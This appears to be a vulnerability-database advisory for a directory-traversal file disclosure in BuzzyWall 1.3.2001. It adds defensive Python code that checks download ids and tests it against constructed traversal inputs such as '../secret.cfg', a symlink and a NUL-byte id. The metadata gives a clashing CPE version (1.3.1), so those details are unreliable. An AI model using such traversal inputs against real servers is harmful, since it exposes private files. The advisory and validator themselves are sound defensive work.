Vendor: BuzzyWall
By: b3hz4d
CVSS: 7.5 (HIGH)
Remote File Disclosure
CWE: 22
Product Name: BuzzyWall
Affected Version From: 1.3.2001
Affected Version To: 1.3.2001
Patch Exists: NO
Related CWE: N/A
CPE: a:buzzywall:buzzywall:1.3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
BuzzyWall Remote File Disclosure Vulnerability
BuzzyWall is affected by a remote file disclosure vulnerability. An attacker can exploit it by sending a specially crafted HTTP request to the vulnerable application. The request carries a crafted value in the 'id' parameter, which specifies the file to be downloaded, and this value can be used to disclose sensitive information from the server. Using directory traversal techniques, an attacker can access sensitive files outside the web root directory.
Mitigation:
The application should validate user input and restrict access to sensitive files outside the web root directory.
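
One way to apply this mitigation to a download handler keyed on an 'id' parameter, shown as an added example that is not BuzzyWall's code. The function name `resolve_download`, the directory layout and the sample ids are constructed for illustration, and POSIX paths are assumed.

```python
import os
import tempfile


class DownloadDenied(Exception):
    """Raised when the requested id does not map to a file under the base directory."""


def resolve_download(base_dir: str, file_id: str) -> str:
    """Map an untrusted 'id' value to a real file path inside base_dir, or raise."""
    if not file_id or "\x00" in file_id:
        raise DownloadDenied("empty id or embedded NUL byte")
    base = os.path.realpath(base_dir)
    # realpath collapses '..' segments and follows symlinks, so the check
    # below sees the location that would actually be opened.
    candidate = os.path.realpath(os.path.join(base, file_id))
    if os.path.commonpath([base, candidate]) != base:
        raise DownloadDenied("path resolves outside the download directory")
    if not os.path.isfile(candidate):
        raise DownloadDenied("not a regular file")
    return candidate


def demo() -> dict:
    """Run constructed ids against a throwaway directory tree; return the outcomes."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        root = os.path.realpath(root)
        base = os.path.join(root, "downloads")  # assumed download directory
        os.mkdir(base)
        with open(os.path.join(base, "report.txt"), "w") as f:
            f.write("public")
        with open(os.path.join(root, "secret.cfg"), "w") as f:
            f.write("private")
        os.symlink(os.path.join(root, "secret.cfg"), os.path.join(base, "link"))
        ids = ["report.txt", "../secret.cfg", os.path.join(root, "secret.cfg"),
               "link", "report.txt\x00.jpg"]  # constructed sample ids
        for file_id in ids:
            try:
                resolve_download(base, file_id)
                results[file_id] = "served"
            except DownloadDenied as exc:
                results[file_id] = f"denied: {exc}"
    return results


if __name__ == "__main__":
    for key, outcome in demo().items():
        print(repr(key), "->", outcome)
```

The containment check runs on the canonical path, so a relative traversal, an absolute path and a symlink pointing outside the directory are all rejected by the same comparison.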